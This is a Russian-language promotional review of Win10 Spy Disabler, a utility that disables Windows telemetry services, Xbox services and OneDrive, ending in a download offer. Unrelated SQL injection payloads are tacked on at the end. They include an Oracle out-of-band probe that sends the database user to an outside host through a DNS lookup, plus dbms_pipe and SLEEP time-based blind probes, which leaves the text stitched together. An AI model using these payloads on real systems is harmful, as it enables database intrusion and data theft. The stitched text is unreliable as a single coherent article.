Для того чтобы отключить ненужные, в функциональном плане, сервисы и службы в ОС Windows 10, была создана утилита Win10 Spy Disabler. Приложение также будет полезным при отключении известных процессов, позволяющих Microsoft собирать данные о вас и ваших действиях.
Утилита будет актуальна не только пользователям Windows 10, но также поможет справиться с необходимыми отключениями и тем, у кого установлена ОС 7,8,8.1. Интерфейс приложения – английский.
Ключевые особенности программы:
- отключение так называемых «шпионских сервисов»: Dmwappushservice, DiagTrack, Wecsvc;
- отключение телеметрических данных и запланированных задач;
- удаление встроенных и включенных «по умолчанию» программ, я имею ввиду - электронную почту, календарь, и т.д.;
- полное удаление OneDrive;
- оптимизация настроек раздела NTFS;
- утилита показывает скрытые файлы и папки и отключает раздел «История»;
- отключает в Офисе 2016 AllowTelemetry и ведение журнала;
- отключает Xbox Services, а именно – XboxNetApiSvc, XblAuthManager, XblGameSave;
- блокирует Microsoft Telemetry Hosts.
С помощью утилиты можно оптимизировать настройки конфиденциальности в Windows 10. Прежде чем начать работать с программой, советую сделать точку восстановления. После применения нужных вам настроек, перезагрузите компьютер.
Как видно из перечисления особенностей программы, её создатели сделали всё от себя зависящее, чтобы «благие намерения» инженеров Microsoft, заботящихся о своей операционной системе, и поэтому сделавших в ней множество лазеек по сбору вашей информации были менее продуктивны. Я не хочу сказать, что в приложении указаны все следящие за вами модули, но то, что с её помощью можно отключить все известные на данный момент – это факт. Чтобы ваши личные сведения не стали доступны «третьим лицам», предлагаю скачать Win10 Spy Disabler по следующей ссылке.
-1 OR X='ss
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(
109)||chr(109)||chr(97) from DUAL)
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('dyr3ifv6rag4uat3pg8h8moq_tguvbahf32myc5o'
||'bw4.r87.me') from DUAL))||'
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105
)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 77f25d3b-7bdb-460e-90fe-f961ee1eace3 */
' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 916a95d0-e4c0-481d-b536-70101c47bb42 */